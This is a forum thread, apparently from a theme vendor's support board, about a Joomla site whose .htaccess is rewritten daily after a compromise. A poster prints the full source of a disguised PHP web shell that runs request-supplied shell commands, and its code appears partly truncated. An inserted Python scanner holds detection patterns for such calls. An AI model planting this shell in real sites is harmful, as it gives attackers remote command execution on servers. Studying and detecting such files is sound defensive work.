
.htaccess changed by hacker daily

    • Tango7
    • Rocketeer
    • Posts: 51
    • Thanks: 0

    Re: .htaccess changed by hacker daily

    Posted 8 years 6 months ago
    • Hello David

      Thanks for your input into this issue.

      Quick question... which two lines do you suggest I edit?

      I tried making the file permission 000 but my site died so put it to 444 when it was 644.
  • Re: .htaccess changed by hacker daily

    Posted 8 years 6 months ago
    • Tango7 wrote:
      Anyone know about RSFirewall? Is that any good and worth the money?

      If you want a solid piece of protection for your site, I strongly urge you to take advantage of the Akeeba Partner Promotion for 20% off and purchase their PRO Bundle. RT offers a discount for members and it is located here: http://www.rockettheme.com/promotions

      For the record, I get NOTHING for recommending this software. I simply won't touch a site unless the owner agrees up front this will be included in their package. It's been that way since I took the plunge in 2006 and I haven't had one hack since then (nor have any of my clients who keep up their subscription).

      In addition, support is STELLAR and this is where your problem would be best directed. If anyone can find your problem, it's Nick at Akeeba. This one incident is worth the investment to get the Akeeba team on YOUR team.

      I'm still following up on this throughout the day as I'm curious to see how it turns out and what happened. In the meantime, protect your site from further intrusions and/or injections by getting Akeeba Pro. It's worth 1,000 times what you pay for it, it keeps you from getting hacked therefore saving your beautiful hair from being pulled out AND you have time to develop, not troubleshoot. Keeps the aspirin bills down as well.
  • Re: .htaccess changed by hacker daily

    Posted 8 years 6 months ago
    • I LOVE a good puzzle. Haha! I'm mainly tossing stuff out there as I find it. You may not want to see all this so tell me if you want me to stop. I'm on a mission at the moment but I can stop, I can, really I can.... well, after we check... and then there's... errrr... back to I CAN stop..?!?!?!?.. maybe not... but I CAN stop thinking out loud in writing if you'd like. ;)

      I strongly urge a phone call to Hostgator. They have strong, high level support for resellers. If you are down, they are losing money so take advantage of that.

      I checked your name servers to find your host at domaintools.com .
      I also did a google search (and a little research) on websitewelcome.com (your nameservers).

      Apparently, websitewelcome.com handles the private name servers (white label domains) for hostgator's private reseller addresses. These servers are also notorious for spam and hacks.

      I found more information here: http://support.hostgator.com/articles/domain-names/what-are-private-name-servers
      Scroll down and read: What Are the Benefits of Having Your Own Name Servers?

      I happen to know that information hasn't changed in several years. Because it comes from an old article, I'd be on the phone with Hostgator to ensure the nameserver information is current or, at least, using an alternate??? And then there's the MX records and the SPF setup.

      Here's why.

      I found more info on: http://www.aboutus.com/WebsiteWelcome.com

      Couple the above and the info it contained, I did a search on google for "websitewelcome.com complaints". You try it and you might get scared enough to make that call.

      And now we're back to THE CODE <<<{{{running---screaming---hiding}}}>>>.

      I have no clue exactly HOW the last line works but I know it's referencing a particular sub-folder called "yoursitename/reo". This indicates either one of two things:
    • There's a folder called "reo" off the YourHost/homefiles/public_html file structure you don't know about OR
      it's possible the referenced folder resides elsewhere, like your YourHost/homefiles/reo structure so you don't notice it.

    • In your HOSTING Control Panel, use the file manager to search for the "reo" folder. Back up as far as you can to your Host/HOME file structure... which is behind the /public_html files. Might even pay you to ask your support tech to make sure there isn't a hidden folder full of files you can't see.

      I would certainly go in and rename the .htaccess to something like BAK.htaccess to put it out of commission. Rename the one supplied by Joomla to see if it works or locks out the redirect. That file already has the proper file permissions so don't change them.
      I'm still trying to wrap my brain around HOW someone can change the .htaccess file to begin with.

      Finally, are you a member of ProjectHoneyPot? If not, join. A few minutes spent, a line or two of code and you just might stop this with one slam dunk. https://www.projecthoneypot.org/

      The last time I dealt with something like this was 2007. I have now shared all the tips and tricks you might expect from a neophyte yet I hope you may find one tidbit of knowledge in there somewhere. LOL

      Hang in there and I'll watch your progress... QUIETLY for a while as I have a family calling me now.
    • Last Edit: 8 years 6 months ago by Empowermom. Reason: typo
    • Tango7
    • Rocketeer
    • Posts: 51
    • Thanks: 0

    Re: .htaccess changed by hacker daily

    Posted 8 years 6 months ago
    • Sorry all who have been following this.... I've had a busy week or two and just not found time to deal with this.

      So... I downloaded my entire site to my MAC and Kaspersky started to throw up all sorts of malware warnings from all sorts of places..even roktwittie ? folder..... loads of places.

      So they all got cleaned out so I re-uploaded the files once cleaned but still the URLs are getting generated.

      With the site still on my MAC, I searched the entire directory for admiin.php and found about 10 files in various locations. I've deleted all of those and uploaded the site again.

      On uploading, I noticed a file in the root which has either always been there and I've just been blind to the spelling error, or it's just appeared but it's called: licemse.php and contains the following code:

      <?php
      $server = $_SERVER;

      if(isset($_POST))
      {
      $command = $_POST;
      }
      else
      {
      header('HTTP/1.0 404 Not Found');
      exit;
      }

      exec($command, $output);

      foreach($output as $var)
      {
      echo substr_replace($var, $server, 0, 1)."---end---";
      }
      ?>

      This looks to me (a very non-code person) as if it looks for 404 errors on the pages it has generated and then regenerates the code all over again. So, if I delete the admiin.php file or if I amend the .htaccess file, it will look at my site, notice the 404 errors and start all over again... Jeez... how to get rid of this thing. It looks so simple but it has riddled my site.
    • David Goode
    • Preeminent Rocketeer
    • Posts: 17058
    • Thanks: 890
    • Web Designer and Host

    Re: .htaccess changed by hacker daily

    Posted 8 years 6 months ago
    • Hi there,

      That is part of the problem. The file is not part of Joomla and is named to make it harder to notice.

      We had a client who was hacked over Christmas and the hacker just kept coming back. We changed passwords, searched files, did file comparisons, scans with maldet etc. In the end it was quicker to simply start with a clean Joomla and copy and paste content across.

      That may be your only option if you cannot find all of the malicious scripts.

      I wish you luck in this task.

    • Please search forums before posting. Please make sure your post includes the version of the CMS you are using and a link to the problem. Annotations on screenshots can also be helpful to explain problems/goals. Please use the "secure" tab for confidential information
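
A sweep for files like the posted licemse.php, as an added example that is not part of the original thread: it walks a web root and flags PHP files that hand request data to a command-execution function, which is what the posted `$command = $_POST;` and `exec($command, $output);` lines do. The function names, the regexes, the function list and both sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Command-execution functions to look for (assumed list; extend as needed).
EXEC_CALL = re.compile(
    r"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\(\s*([^,)]*)", re.I)
REQUEST_SRC = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")
ASSIGN = re.compile(r"(\$\w+)\s*=\s*([^;]*);")

# Constructed samples: the first reuses two lines of the file posted above.
SAMPLE_DROPPED = "<?php\n$command = $_POST;\nexec($command, $output);\n"
SAMPLE_BENIGN = "<?php\nexec('uptime', $out);\necho $out[0];\n"


def scan_php(source):
    """Return exec-style calls whose first argument comes from the request."""
    # Variables assigned straight from a request superglobal count as tainted.
    tainted = {m.group(1) for m in ASSIGN.finditer(source)
               if REQUEST_SRC.search(m.group(2))}
    hits = []
    for m in EXEC_CALL.finditer(source):
        arg = m.group(2).strip()
        if REQUEST_SRC.search(arg) or arg in tainted:
            hits.append(f"{m.group(1)}({arg})")
    return hits


def scan_tree(root):
    """Map each flagged .php file (path relative to root) to its hits."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php(path.read_text(errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report


def demo():
    """Scan a small constructed tree: one dropped file, one benign file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "includes").mkdir()
        (root / "licemse.php").write_text(SAMPLE_DROPPED)
        (root / "includes" / "uptime.php").write_text(SAMPLE_BENIGN)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

A hit is a lead for manual review, and code that hides the call behind encoding or variable function names will not match, so a comparison against a clean Joomla package of the same version is still needed.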
  • Re: .htaccess changed by hacker daily

    Posted 8 years 6 months ago
    • As outlined earlier, this is not a template issue or a Joomla issue. You may or may not receive the critical information you seek in this forum. You could do a post to request services from a member, but that's a hit or miss proposition given the time you've invested and are still investing on the problem. And they'll probably charge you for the help.

      So here I say again, there's a darn good reason so many site owners and Joomla vendors swear by Akeeba, including RT. RT members even get a discount for Akeeba. See this page: www.rockettheme.com/promotions

      I suggest you purchase the PRO subscription bundle for a year's worth of security at your fingertips.... and as I mentioned earlier, stellar support. If you want to submit a ticket for their support before the weekend, now would be a good time to subscribe.

      I have used this product since it came out. Your investment would be well rewarded far more than the angst you are experiencing at present, you'll have experts at your disposal and it will probably cost far less than you could pay someone to go through all this.

      Get Akeeba.... be happy! (And NO, that is not a paid political announcement. It's based on facts and many years of experience.)

      I hope you get help quickly. I've been there, done that, hate it, don't want to go back to it, and I FEEL your pain. ;)
